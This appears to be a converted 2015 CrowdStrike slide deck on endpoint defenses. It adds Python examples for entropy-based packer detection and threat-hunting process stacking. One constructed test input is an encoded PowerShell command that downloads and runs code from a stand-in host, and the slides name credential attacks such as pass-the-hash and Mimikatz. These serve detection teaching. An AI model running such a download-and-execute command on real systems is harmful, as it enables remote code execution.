The Next Frontier in Endpoint Security: Dan Larson, Crowdstrike

The document discusses the next frontier in endpoint security and how to stop cyber attacks. It notes that breaches have risen 22% in recent years, with the average dwell time being 146 days and cost per stolen record being $150. Many attacks exploit weak passwords, malware, or abuse legitimate tools. A combination of approaches is needed to effectively block attacks, including machine learning, behavioral analytics, exploit mitigation, sandboxing, detection and response, and threat hunting. Each technique has strengths and limitations, so considering the entire cyber kill chain is important.


THE NEXT FRONTIER

IN ENDPOINT SECURITY
DAN LARSON, CROWDSTRIKE

2015 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


BREACHES

22%       Rise in breaches
146 days  Average dwell time
$150      Cost per stolen record



77%
77 percent of U.S. businesses admitted that they have suffered between one and five separate incidents of data loss, leakage or exposure in the past 12 months.
HOW ARE THE BAD GUYS GETTING IN?



1. Abuse of weak domain user passwords (guessing and spraying)
2. Broadcast name resolution poisoning (LLMNR/NBT-NS responses, e.g. to hijack WPAD lookups)
3. Local admin password attacks (pass-the-hash with a shared local admin hash)
4. Attacks on cleartext passwords and hashes in LSASS memory (Mimikatz)
5. Insufficient network segmentation



MAKING MATTERS WORSE



ZERO DAYS ARE A LAST RESORT



HOW DO WE STOP THE BAD GUYS?



MACHINE LEARNING

- Effective against: new, modified or packed malware
- Primary benefit: anti-malware efficacy and system performance
- Caution:
  - Watch out for the "learning" period
  - Malware is used in less than 50% of attacks
- Blind spots: the rest of the kill chain, and advanced infection vectors like web shells or "file-less" malware
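The reason a static model does well on packed or modified malware, and the reason it has nothing to say about a file-less attack, is visible in the features it consumes. The following is an added example, not CrowdStrike code and not a trained model: it computes three file-content features (overall byte entropy, the fraction of fixed-size windows that are near-random, and the printable-byte ratio) and applies assumed thresholds. The samples are constructed: PRNG output stands in for a packed section, a repeated DOS stub stands in for plain code, and an encoded PowerShell command line stands in for a file-less attack that never writes a payload to disk.

```python
import base64
import math
import random


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, up to 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def static_features(data: bytes, window: int = 1024) -> dict:
    """Three file-level features a packer-aware classifier would consume.
    Window size and the 7.0 bits/byte cutoff are assumptions for illustration."""
    chunks = [data[i:i + window] for i in range(0, len(data) - window + 1, window)]
    chunk_entropy = [shannon_entropy(c) for c in chunks]
    high = sum(1 for e in chunk_entropy if e > 7.0)
    printable = sum(1 for b in data if 32 <= b < 127)
    return {
        "entropy": round(shannon_entropy(data), 3),
        "high_entropy_fraction": round(high / len(chunk_entropy), 3) if chunk_entropy else 0.0,
        "printable_ratio": round(printable / len(data), 3) if data else 0.0,
    }


def looks_packed(data: bytes) -> bool:
    """Whole file is near-random and almost every window is too: a packed or
    encrypted payload, which is what lets a static model flag new or modified
    malware without a signature. Thresholds are assumed, not tuned."""
    f = static_features(data)
    return f["entropy"] > 7.0 and f["high_entropy_fraction"] >= 0.75


# Constructed samples (no real malware involved).
_rng = random.Random(2015)
PACKED_SAMPLE = bytes(_rng.getrandbits(8) for _ in range(4096))       # stand-in for a packed section
PLAIN_SAMPLE = (b"MZ\x90\x00" + b"This program cannot be run in DOS mode.\r\n" * 100)[:4096]
# A "file-less" attack leaves no payload on disk to score; the defender only
# has a command line, and file-content features cannot judge it (blind spot).
FILELESS_CMDLINE = b"powershell.exe -nop -w hidden -enc " + base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')".encode("utf-16le")
)

if __name__ == "__main__":
    for name, blob in (("packed", PACKED_SAMPLE), ("plain", PLAIN_SAMPLE), ("fileless", FILELESS_CMDLINE)):
        print(name, static_features(blob), looks_packed(blob))
```

The constructed packed sample scores as packed, the plain sample does not, and the encoded PowerShell command line does not either: base64 text is well under 7 bits per byte, and there is no file to hand to the model in the first place. That gap is what the behavioral techniques on the following slides exist to cover.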



BEHAVIORAL ANALYTICS

- Effective against:
  - Web shells and other advanced infections (e.g. stolen passwords and abuse of legitimate tools)
  - Ransomware
  - Lateral movement
  - Persistence
  - Data access and exfiltration
- Primary benefit: coverage for malware-free attacks and polymorphic malware
- Caution: detecting is easier than preventing
- Blind spots: anything happening pre-execution



EXPLOIT MITIGATION

- Effective against: exploits, including the hugely prevalent exploit kits
- Primary benefit: system hardening
- Caution: learning mode, false positives, extracting value
- Blind spots: insider threat, stolen credentials, abuse of legitimate tools



SANDBOXING & ISOLATION

- Effective against: exploits, including the hugely prevalent exploit kits
- Primary benefit: impact reduction
- Caution: now a part of Windows; user impact
- Blind spots: insider threat, stolen credentials, abuse of legitimate tools



DETECTION & RESPONSE

- Effective against: advanced threats, zero days, APT activity, insider threat, abuse of legitimate tools
- Primary benefit: visibility
- Caution:
  - Who does the work?
  - How "smart" is it?
  - Does it scale?
  - Do you really want forensics?
- Blind spots: prevention



THREAT HUNTING

- Effective against: advanced threats, zero days, APT activity, insider threat, abuse of legitimate tools
- Primary benefit: visibility, tailored detections
- Caution:
  - Do you have the talent for this?
  - Hunting vs. MSSP
  - Data availability and breadth
- Blind spots: prevention
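"Visibility" and "tailored detections" on this slide are two halves of one workflow: a hunter stacks telemetry across the fleet to find what is rare, pivots into the raw events, and turns a confirmed finding into a rule. The following is an added example, not CrowdStrike code: frequency analysis of parent-to-child process pairs over constructed Sysmon event 1 style records from a 40-workstation fleet. Host names, process pairs and the "rare" cutoff are assumptions.

```python
from collections import defaultdict


def _fleet(parent, image, hosts):
    return [{"host": h, "parent": parent, "image": image} for h in hosts]


# Constructed process-creation records (not real telemetry).
ALL_HOSTS = [f"WS-{i:02d}" for i in range(1, 41)]
PROCESS_EVENTS = (
    _fleet("explorer.exe", "outlook.exe", ALL_HOSTS)
    + _fleet("services.exe", "svchost.exe", ALL_HOSTS)
    + _fleet("svchost.exe", "rundll32.exe", ALL_HOSTS[:38])
    + _fleet("outlook.exe", "winword.exe", ALL_HOSTS[:25])
    + _fleet("explorer.exe", "cmd.exe", ["WS-01", "WS-02", "WS-09"])   # helpdesk staff
    + _fleet("winword.exe", "powershell.exe", ["WS-17"])               # the outlier
    + _fleet("winword.exe", "powershell.exe", ["WS-17"])               # seen twice, same host
)


def stack_parent_child(events, max_hosts=2):
    """Frequency analysis ("stacking"): count distinct hosts per parent->child
    pair and return the pairs seen on max_hosts hosts or fewer, rarest first.
    Counting hosts rather than raw events keeps one noisy machine from
    looking common."""
    hosts_by_pair = defaultdict(set)
    for e in events:
        hosts_by_pair[(e["parent"].lower(), e["image"].lower())].add(e["host"])
    rare = [(pair, sorted(hosts)) for pair, hosts in hosts_by_pair.items()
            if len(hosts) <= max_hosts]
    return sorted(rare, key=lambda item: (len(item[1]), item[0]))


def events_for_pair(events, parent, image):
    """Pivot: every raw event behind a pair the hunter wants to inspect."""
    return [e for e in events
            if e["parent"].lower() == parent and e["image"].lower() == image]


def tailored_detection(events, parent, image, allowed_hosts=()):
    """Codify a confirmed finding: fire on this parent->child pair on any host
    outside the set the hunter verified as legitimate."""
    allowed = set(allowed_hosts)
    return [e for e in events_for_pair(events, parent, image) if e["host"] not in allowed]


if __name__ == "__main__":
    for pair, hosts in stack_parent_child(PROCESS_EVENTS, max_hosts=3):
        print(pair, hosts)
    for hit in tailored_detection(PROCESS_EVENTS, "explorer.exe", "cmd.exe", ["WS-01", "WS-02"]):
        print("alert:", hit)
```

The hunt surfaces winword.exe spawning powershell.exe on a single host, which no frequency-agnostic rule on the previous slides would have flagged without someone writing it first. The "data availability and breadth" caution applies directly: the stacking only works if process-creation telemetry from every host is actually being collected and retained.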



CLOSING THOUGHTS

THINK ABOUT THE ENTIRE KILL CHAIN

PENETRATION TEST NEW PRODUCTS

